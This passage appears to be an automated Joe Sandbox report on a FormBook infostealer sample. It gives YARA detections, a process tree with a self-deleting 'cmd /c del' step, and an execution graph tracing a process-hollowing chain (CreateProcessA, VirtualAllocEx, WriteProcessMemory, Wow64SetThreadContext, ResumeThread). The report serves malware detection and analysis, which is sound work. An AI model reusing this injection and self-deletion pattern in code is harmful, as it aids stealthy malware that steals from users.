                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1372076651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1372076651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.1372076651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.1372076651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                Reputation:low
                                                                                                Has exited:true

                                                                                                Target ID:3
                                                                                                Start time:08:27:10
                                                                                                Start date:24/10/2023
                                                                                                Path:C:\Windows\explorer.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\Explorer.EXE
                                                                                                Imagebase:0x7ff611de0000
                                                                                                File size:5'141'208 bytes
                                                                                                MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:false

                                                                                                Target ID:4
                                                                                                Start time:08:27:12
                                                                                                Start date:24/10/2023
                                                                                                Path:C:\Windows\SysWOW64\cmmon32.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:C:\Windows\SysWOW64\cmmon32.exe
                                                                                                Imagebase:0x450000
                                                                                                File size:36'352 bytes
                                                                                                MD5 hash:DEC326E5B4D23503EA5176878DDDB683
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.3791675390.0000000002680000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3791675390.0000000002680000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3791675390.0000000002680000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.3791675390.0000000002680000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.3791675390.0000000002680000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.3793711799.00000000026B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3793711799.00000000026B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3793711799.00000000026B0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.3793711799.00000000026B0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.3793711799.00000000026B0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.3790265630.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3790265630.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3790265630.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.3790265630.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.3790265630.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                Reputation:moderate
                                                                                                Has exited:false

                                                                                                Target ID:5
                                                                                                Start time:08:27:15
                                                                                                Start date:24/10/2023
                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:/c del "C:\Users\user\Desktop\GCeHcfCef8.exe"
                                                                                                Imagebase:0xc30000
                                                                                                File size:236'544 bytes
                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                Target ID:6
                                                                                                Start time:08:27:15
                                                                                                Start date:24/10/2023
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff68cce0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                Reset < >

                                                                                                  Execution Graph

                                                                                                  Execution Coverage:9.6%
                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                  Signature Coverage:0%
                                                                                                  Total number of Nodes:198
                                                                                                  Total number of Limit Nodes:14
                                                                                                  execution_graph 42142 16ed01c 42143 16ed034 42142->42143 42144 16ed08e 42143->42144 42147 5692808 42143->42147 42152 5692818 42143->42152 42149 5692818 42147->42149 42148 5692877 42149->42148 42157 5692991 42149->42157 42162 56929a0 42149->42162 42153 5692845 42152->42153 42154 5692877 42153->42154 42155 5692991 2 API calls 42153->42155 42156 56929a0 2 API calls 42153->42156 42155->42154 42156->42154 42158 56929a0 42157->42158 42167 5692a58 42158->42167 42170 5692a47 42158->42170 42159 5692a40 42159->42148 42164 56929b4 42162->42164 42163 5692a40 42163->42148 42165 5692a58 2 API calls 42164->42165 42166 5692a47 2 API calls 42164->42166 42165->42163 42166->42163 42168 5692a69 42167->42168 42174 5694012 42167->42174 42168->42159 42171 5692a58 42170->42171 42172 5694012 2 API calls 42171->42172 42173 5692a69 42171->42173 42172->42173 42173->42159 42178 5694040 42174->42178 42182 5694030 42174->42182 42175 569402a 42175->42168 42179 5694082 42178->42179 42181 5694089 42178->42181 42180 56940da CallWindowProcW 42179->42180 42179->42181 42180->42181 42181->42175 42183 5694082 42182->42183 42185 5694089 42182->42185 42184 56940da CallWindowProcW 42183->42184 42183->42185 42184->42185 42185->42175 41924 bf3f4f0 41925 bf3f50e 41924->41925 41926 bf3f518 41924->41926 41929 bf3f543 41925->41929 41934 bf3f558 41925->41934 41930 bf3f566 41929->41930 41933 bf3f585 41929->41933 41939 bf3ee2c 41930->41939 41933->41926 41935 bf3f566 41934->41935 41938 bf3f585 41934->41938 41936 bf3ee2c FindCloseChangeNotification 41935->41936 41937 bf3f581 41936->41937 41937->41926 41938->41926 41940 bf3f6d0 FindCloseChangeNotification 41939->41940 41941 bf3f581 41940->41941 41941->41926 41965 bf3d4d0 41966 bf3d65b 41965->41966 41967 bf3d4f6 41965->41967 41967->41966 41969 bf37c28 41967->41969 41970 bf3d750 PostMessageW 41969->41970 41971 bf3d7bc 41970->41971 41971->41967 41972 18d4668 41973 18d467a 41972->41973 41974 18d4686 41973->41974 41976 18d4779 41973->41976 41977 18d479d 41976->41977 41981 18d4888 41977->41981 41985 18d4878 41977->41985 41983 18d48af 41981->41983 41982 18d498c 41982->41982 41983->41982 41989 18d44b0 41983->41989 41987 18d4888 41985->41987 41986 18d498c 41986->41986 41987->41986 41988 18d44b0 CreateActCtxA 41987->41988 41988->41986 41990 18d5918 CreateActCtxA 41989->41990 41992 18d59db 41990->41992 41992->41992 41993 bf3c7da 41997 bf3cd60 41993->41997 42006 bf3cc50 41993->42006 41994 bf3c7e8 41998 bf3cd69 41997->41998 41999 bf3cd77 41998->41999 42015 bf3d103 41998->42015 42026 bf3d16c 41998->42026 42033 bf3ce9f 41998->42033 42041 bf3d154 41998->42041 42049 bf3d3f4 41998->42049 42057 bf3d1c1 41998->42057 41999->41994 42007 bf3cc81 42006->42007 42008 bf3cc70 42007->42008 42009 bf3d103 6 API calls 42007->42009 42010 bf3d1c1 11 API calls 42007->42010 42011 bf3d3f4 4 API calls 42007->42011 42012 bf3d154 4 API calls 42007->42012 42013 bf3ce9f 4 API calls 42007->42013 42014 bf3d16c 4 API calls 42007->42014 42008->41994 42009->42008 42010->42008 42011->42008 42012->42008 42013->42008 42014->42008 42016 bf3d111 42015->42016 42074 bf3c0e0 42016->42074 42078 bf3c0d8 42016->42078 42017 bf3d149 42019 bf3cf71 42017->42019 42090 bf3c198 42017->42090 42094 bf3c1a0 42017->42094 42018 bf3d38e 42018->41999 42019->42018 42082 bf3bcf8 42019->42082 42086 bf3bcf0 42019->42086 42031 bf3c1a0 WriteProcessMemory 42026->42031 42032 bf3c198 WriteProcessMemory 42026->42032 42027 bf3d38e 42027->41999 42028 bf3cf71 42028->42027 42029 bf3bcf0 ResumeThread 42028->42029 42030 bf3bcf8 ResumeThread 42028->42030 42029->42028 42030->42028 42031->42028 42032->42028 42034 bf3cee0 42033->42034 42098 bf3c428 42034->42098 42102 bf3c41d 42034->42102 42042 bf3d161 42041->42042 42047 bf3c1a0 WriteProcessMemory 42042->42047 42048 bf3c198 WriteProcessMemory 42042->42048 42043 bf3d38e 42043->41999 42044 bf3cf71 42044->42043 42045 bf3bcf0 ResumeThread 42044->42045 42046 bf3bcf8 ResumeThread 42044->42046 42045->42044 42046->42044 42047->42044 42048->42044 42050 bf3cee0 42049->42050 42051 bf3d38e 42050->42051 42055 bf3c428 CreateProcessA 42050->42055 42056 bf3c41d CreateProcessA 42050->42056 42051->41999 42052 bf3cf35 42052->42051 42053 bf3bcf0 ResumeThread 42052->42053 42054 bf3bcf8 ResumeThread 42052->42054 42053->42052 42054->42052 42055->42052 42056->42052 42106 bf3c001 42057->42106 42110 bf3bda8 42057->42110 42115 bf3bd97 42057->42115 42058 bf3d1d6 42062 bf3cf71 42058->42062 42120 bf3c288 42058->42120 42124 bf3c290 42058->42124 42059 bf3d149 42059->42062 42068 bf3c1a0 WriteProcessMemory 42059->42068 42069 bf3c198 WriteProcessMemory 42059->42069 42060 bf3d103 42060->42059 42060->42062 42072 bf3c0e0 VirtualAllocEx 42060->42072 42073 bf3c0d8 VirtualAllocEx 42060->42073 42061 bf3d38e 42061->41999 42062->42061 42066 bf3bcf0 ResumeThread 42062->42066 42067 bf3bcf8 ResumeThread 42062->42067 42066->42062 42067->42062 42068->42062 42069->42062 42072->42059 42073->42059 42075 bf3c120 VirtualAllocEx 42074->42075 42077 bf3c15d 42075->42077 42077->42017 42079 bf3c120 VirtualAllocEx 42078->42079 42081 bf3c15d 42079->42081 42081->42017 42083 bf3bd38 ResumeThread 42082->42083 42085 bf3bd69 42083->42085 42085->42019 42087 bf3bd38 ResumeThread 42086->42087 42089 bf3bd69 42087->42089 42089->42019 42091 bf3c1e8 WriteProcessMemory 42090->42091 42093 bf3c23f 42091->42093 42093->42019 42095 bf3c1e8 WriteProcessMemory 42094->42095 42097 bf3c23f 42095->42097 42097->42019 42099 bf3c4b1 42098->42099 42099->42099 42100 bf3c616 CreateProcessA 42099->42100 42101 bf3c673 42100->42101 42101->42101 42103 bf3c4b1 CreateProcessA 42102->42103 42105 bf3c673 42103->42105 42105->42105 42107 bf3c04d Wow64SetThreadContext 42106->42107 42109 bf3c095 42107->42109 42109->42058 42111 bf3bddc 42110->42111 42112 bf3c06d Wow64SetThreadContext 42111->42112 42114 bf3be2f 42111->42114 42113 bf3c095 42112->42113 42113->42058 42114->42058 42116 bf3bddc 42115->42116 42117 bf3c06d Wow64SetThreadContext 42116->42117 42119 bf3be2f 42116->42119 42118 bf3c095 42117->42118 42118->42058 42119->42058 42121 bf3c2db ReadProcessMemory 42120->42121 42123 bf3c31f 42121->42123 42123->42060 42125 bf3c2db ReadProcessMemory 42124->42125 42127 bf3c31f 42125->42127 42127->42060 41942 18dac50 41943 18dac5f 41942->41943 41945 18dad48 41942->41945 41946 18dad59 41945->41946 41947 18dad7c 41945->41947 41946->41947 41953 18dafe0 41946->41953 41957 18dafd0 41946->41957 41947->41943 41948 18dad74 41948->41947 41949 18daf80 GetModuleHandleW 41948->41949 41950 18dafad 41949->41950 41950->41943 41955 18daff4 41953->41955 41954 18db019 41954->41948 41955->41954 41961 18da0d0 41955->41961 41958 18daff4 41957->41958 41959 18db019 41958->41959 41960 18da0d0 LoadLibraryExW 41958->41960 41959->41948 41960->41959 41962 18db1c0 LoadLibraryExW 41961->41962 41964 18db239 41962->41964 41964->41954 42128 18dcfe0 42129 18dd026 42128->42129 42133 18dd5b8 42129->42133 42136 18dd5c8 42129->42136 42130 18dd113 42139 18dd21c 42133->42139 42137 18dd5f6 42136->42137 42138 18dd21c DuplicateHandle 42136->42138 42137->42130 42138->42137 42140 18dd630 DuplicateHandle 42139->42140 42141 18dd5f6 42140->42141 42141->42130
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1347591301.0000000005690000.00000040.00000800.00020000.00000000.sdmp, Offset: 05690000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5690000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: (o_q$(o_q$,cq$,cq$Hcq
                                                                                                  • API String ID: 0-4110691418
                                                                                                  • Opcode ID: 6f91ea145f3eb6ae9eb616c5529ab691144b21fbcf0382c1a076dd075ce1e590
                                                                                                  • Instruction ID: 879928990db9cde1e09c9bf15566b61ef93a05934908ca947d5a2405346110ec
                                                                                                  • Opcode Fuzzy Hash: 6f91ea145f3eb6ae9eb616c5529ab691144b21fbcf0382c1a076dd075ce1e590
                                                                                                  • Instruction Fuzzy Hash: E0525474B00115DFCF18DF69C894A6EBBBABF84710B158169E816DB764DB32EC41CB90
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1347591301.0000000005690000.00000040.00000800.00020000.00000000.sdmp, Offset: 05690000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5690000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: f8a40394e4996e4ba73e8af55697ec641d79f132c632f4af4dc1e6924f629198
                                                                                                  • Instruction ID: 334989a01c63f71a559d8be43189770850d7da749007421868fbb580e00ad43d
                                                                                                  • Opcode Fuzzy Hash: f8a40394e4996e4ba73e8af55697ec641d79f132c632f4af4dc1e6924f629198
                                                                                                  • Instruction Fuzzy Hash: 35A2B638A11219CFCB25DF64C994AD9B7B2FF89301F1181E9E509AB365DB31AE85CF40
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1347591301.0000000005690000.00000040.00000800.00020000.00000000.sdmp, Offset: 05690000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_5690000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 97b29cd7652e912eb77b20a914171f9364b061b6849196457ec64d4ceb0eec96
                                                                                                  • Instruction ID: f94d92ca3b6f59c3390357475251d901800a57233da0a7e286d91bb07565261b
                                                                                                  • Opcode Fuzzy Hash: 97b29cd7652e912eb77b20a914171f9364b061b6849196457ec64d4ceb0eec96
                                                                                                  • Instruction Fuzzy Hash: 0D92D538A11619CFCB25DF64C898AD9B7B2FF89301F1141E9E509AB365DB31AE85CF40
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1348660645.000000000BF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BF30000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_bf30000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 07fc821e67ff36eaaf788f7ed3d5cf51decb834438e857a04432d20829becf59
                                                                                                  • Instruction ID: 5812f1b207db5ed987101b7f6dc79b50b015c758e1cdbe6e7fb5cbac9b9ce532
                                                                                                  • Opcode Fuzzy Hash: 07fc821e67ff36eaaf788f7ed3d5cf51decb834438e857a04432d20829becf59
                                                                                                  • Instruction Fuzzy Hash: 8DC13A72D19219DFCB18CFA6D98059EFBB6FF99700F10D42AD026AB264D7349946CF04
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1348660645.000000000BF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BF30000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_bf30000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 24956f0d241739a90d69e9054d45e9819a6436454cba233dd64f113faa9a8474
                                                                                                  • Instruction ID: fe81fd9eec68b6ccad5009beb1476a0a11f9163eea7fdbbe404478e958024b1a
                                                                                                  • Opcode Fuzzy Hash: 24956f0d241739a90d69e9054d45e9819a6436454cba233dd64f113faa9a8474
                                                                                                  • Instruction Fuzzy Hash: 82C13A72E19219DFCB18CFA6D98059EFBF6FF99700F10942AD026AB264D7349946CF04
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1348660645.000000000BF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BF30000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_bf30000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 8e905b1a96d5d3a238bb506365f562f4e067169c8534fe579a35e8e39ac7794d
                                                                                                  • Instruction ID: 2a1d644bc7528b51ec721c06119e0ccb675553f79715edc4071ab348b76636aa
                                                                                                  • Opcode Fuzzy Hash: 8e905b1a96d5d3a238bb506365f562f4e067169c8534fe579a35e8e39ac7794d
                                                                                                  • Instruction Fuzzy Hash: 8E51F5B5E051199BCB04DFAAD5809AEFBF2FF98300F24C529D419A7355DB34A941CFA0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1348660645.000000000BF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BF30000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_bf30000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 890f796c0a77b90271c990d748408d957d5b47793e4963e00b80467c168f288f
                                                                                                  • Instruction ID: e5c9c89b03c613207f868f8bac3aac34b553f92d539bd6cd72270384705c3859
                                                                                                  • Opcode Fuzzy Hash: 890f796c0a77b90271c990d748408d957d5b47793e4963e00b80467c168f288f
                                                                                                  • Instruction Fuzzy Hash: 0D41E6B5E016198FDB08DFAAD98069EFBF2FF88300F14C46AD819A7354DB349945CB90
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 1070 bf3bda8-bf3bdd6 1071 bf3be7d-bf3be80 1070->1071 1072 bf3bddc-bf3bdf2 1070->1072 1073 bf3be82-bf3be8a 1071->1073 1074 bf3becc-bf3becf 1071->1074 1075 bf3bdf8-bf3be00 1072->1075 1076 bf3bfed-bf3c053 1072->1076 1079 bf3be98-bf3bebe 1073->1079 1080 bf3be8c-bf3be8e 1073->1080 1077 bf3bfe5-bf3bfec 1074->1077 1078 bf3bed5-bf3beeb 1074->1078 1075->1076 1081 bf3be06-bf3be16 1075->1081 1092 bf3c063-bf3c093 Wow64SetThreadContext 1076->1092 1093 bf3c055-bf3c061 1076->1093 1078->1076 1084 bf3bef1-bf3bef9 1078->1084 1079->1076 1098 bf3bec4-bf3bec7 1079->1098 1080->1079 1081->1076 1082 bf3be1c-bf3be29 1081->1082 1082->1076 1085 bf3be2f-bf3be46 1082->1085 1084->1076 1088 bf3beff-bf3bf0c 1084->1088 1089 bf3be48-bf3be4b 1085->1089 1090 bf3be4d 1085->1090 1088->1076 1091 bf3bf12-bf3bf22 1088->1091 1094 bf3be4f-bf3be78 1089->1094 1090->1094 1091->1076 1096 bf3bf28-bf3bf45 1091->1096 1100 bf3c095-bf3c09b 1092->1100 1101 bf3c09c-bf3c0cc 1092->1101 1093->1092 1094->1077 1096->1076 1099 bf3bf4b-bf3bf53 1096->1099 1098->1077 1099->1076 1103 bf3bf59-bf3bf69 1099->1103 1100->1101 1103->1076 1104 bf3bf6f-bf3bf7c 1103->1104 1104->1076 1105 bf3bf7e-bf3bf95 1104->1105 1109 bf3bf97 1105->1109 1110 bf3bf9a-bf3bfd8 1105->1110 1109->1110 1118 bf3bfda 1110->1118 1119 bf3bfdd 1110->1119 1118->1119 1119->1077
                                                                                                  APIs
                                                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0BF3C086
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1348660645.000000000BF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BF30000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_bf30000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ContextThreadWow64
                                                                                                  • String ID:
                                                                                                  • API String ID: 983334009-0
                                                                                                  • Opcode ID: 098c5927100b32e9b6c8097f987ba07f11337e16ac1cafb172762acbb2ea56ea
                                                                                                  • Instruction ID: c5e2556b94f59b7ade3004a09dc647937a474736c79d7bf20eb6b83618be815c
                                                                                                  • Opcode Fuzzy Hash: 098c5927100b32e9b6c8097f987ba07f11337e16ac1cafb172762acbb2ea56ea
                                                                                                  • Instruction Fuzzy Hash: 1691AC71A041258BCB05CB6DC8A0A7EFBB2EFC9710B14C61AE4699B35AC775EC41CBD0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 1120 bf3c41d-bf3c4bd 1122 bf3c4f6-bf3c516 1120->1122 1123 bf3c4bf-bf3c4c9 1120->1123 1130 bf3c518-bf3c522 1122->1130 1131 bf3c54f-bf3c57e 1122->1131 1123->1122 1124 bf3c4cb-bf3c4cd 1123->1124 1125 bf3c4f0-bf3c4f3 1124->1125 1126 bf3c4cf-bf3c4d9 1124->1126 1125->1122 1128 bf3c4db 1126->1128 1129 bf3c4dd-bf3c4ec 1126->1129 1128->1129 1129->1129 1132 bf3c4ee 1129->1132 1130->1131 1133 bf3c524-bf3c526 1130->1133 1139 bf3c580-bf3c58a 1131->1139 1140 bf3c5b7-bf3c671 CreateProcessA 1131->1140 1132->1125 1135 bf3c549-bf3c54c 1133->1135 1136 bf3c528-bf3c532 1133->1136 1135->1131 1137 bf3c536-bf3c545 1136->1137 1138 bf3c534 1136->1138 1137->1137 1141 bf3c547 1137->1141 1138->1137 1139->1140 1142 bf3c58c-bf3c58e 1139->1142 1151 bf3c673-bf3c679 1140->1151 1152 bf3c67a-bf3c700 1140->1152 1141->1135 1144 bf3c5b1-bf3c5b4 1142->1144 1145 bf3c590-bf3c59a 1142->1145 1144->1140 1146 bf3c59e-bf3c5ad 1145->1146 1147 bf3c59c 1145->1147 1146->1146 1149 bf3c5af 1146->1149 1147->1146 1149->1144 1151->1152 1162 bf3c702-bf3c706 1152->1162 1163 bf3c710-bf3c714 1152->1163 1162->1163 1164 bf3c708 1162->1164 1165 bf3c716-bf3c71a 1163->1165 1166 bf3c724-bf3c728 1163->1166 1164->1163 1165->1166 1167 bf3c71c 1165->1167 1168 bf3c72a-bf3c72e 1166->1168 1169 bf3c738-bf3c73c 1166->1169 1167->1166 1168->1169 1170 bf3c730 1168->1170 1171 bf3c74e-bf3c755 1169->1171 1172 bf3c73e-bf3c744 1169->1172 1170->1169 1173 bf3c757-bf3c766 1171->1173 1174 bf3c76c 1171->1174 1172->1171 1173->1174 1176 bf3c76d 1174->1176 1176->1176
                                                                                                  APIs
                                                                                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0BF3C65E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1348660645.000000000BF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BF30000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_bf30000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateProcess
                                                                                                  • String ID:
                                                                                                  • API String ID: 963392458-0
                                                                                                  • Opcode ID: e6b9bbcb271a8f93188084fd8b08d0c7fca087aee399c687b1c1b870888e0285
                                                                                                  • Instruction ID: f592274af8dc368e332d6fbe57ce6a61f1fa343b2bc1407f27dcb6c2b12da617
                                                                                                  • Opcode Fuzzy Hash: e6b9bbcb271a8f93188084fd8b08d0c7fca087aee399c687b1c1b870888e0285
                                                                                                  • Instruction Fuzzy Hash: 9BA13572D00319DFDB20CFA8C841BEEBBB2EB48714F1485AAD849B7240DB749985CF91
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 1177 bf3c428-bf3c4bd 1179 bf3c4f6-bf3c516 1177->1179 1180 bf3c4bf-bf3c4c9 1177->1180 1187 bf3c518-bf3c522 1179->1187 1188 bf3c54f-bf3c57e 1179->1188 1180->1179 1181 bf3c4cb-bf3c4cd 1180->1181 1182 bf3c4f0-bf3c4f3 1181->1182 1183 bf3c4cf-bf3c4d9 1181->1183 1182->1179 1185 bf3c4db 1183->1185 1186 bf3c4dd-bf3c4ec 1183->1186 1185->1186 1186->1186 1189 bf3c4ee 1186->1189 1187->1188 1190 bf3c524-bf3c526 1187->1190 1196 bf3c580-bf3c58a 1188->1196 1197 bf3c5b7-bf3c671 CreateProcessA 1188->1197 1189->1182 1192 bf3c549-bf3c54c 1190->1192 1193 bf3c528-bf3c532 1190->1193 1192->1188 1194 bf3c536-bf3c545 1193->1194 1195 bf3c534 1193->1195 1194->1194 1198 bf3c547 1194->1198 1195->1194 1196->1197 1199 bf3c58c-bf3c58e 1196->1199 1208 bf3c673-bf3c679 1197->1208 1209 bf3c67a-bf3c700 1197->1209 1198->1192 1201 bf3c5b1-bf3c5b4 1199->1201 1202 bf3c590-bf3c59a 1199->1202 1201->1197 1203 bf3c59e-bf3c5ad 1202->1203 1204 bf3c59c 1202->1204 1203->1203 1206 bf3c5af 1203->1206 1204->1203 1206->1201 1208->1209 1219 bf3c702-bf3c706 1209->1219 1220 bf3c710-bf3c714 1209->1220 1219->1220 1221 bf3c708 1219->1221 1222 bf3c716-bf3c71a 1220->1222 1223 bf3c724-bf3c728 1220->1223 1221->1220 1222->1223 1224 bf3c71c 1222->1224 1225 bf3c72a-bf3c72e 1223->1225 1226 bf3c738-bf3c73c 1223->1226 1224->1223 1225->1226 1227 bf3c730 1225->1227 1228 bf3c74e-bf3c755 1226->1228 1229 bf3c73e-bf3c744 1226->1229 1227->1226 1230 bf3c757-bf3c766 1228->1230 1231 bf3c76c 1228->1231 1229->1228 1230->1231 1233 bf3c76d 1231->1233 1233->1233
                                                                                                  APIs
                                                                                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0BF3C65E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1348660645.000000000BF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BF30000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_bf30000_GCeHcfCef8.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateProcess
                                                                                                  • String ID:
                                                                                                  • API String ID: 963392458-0
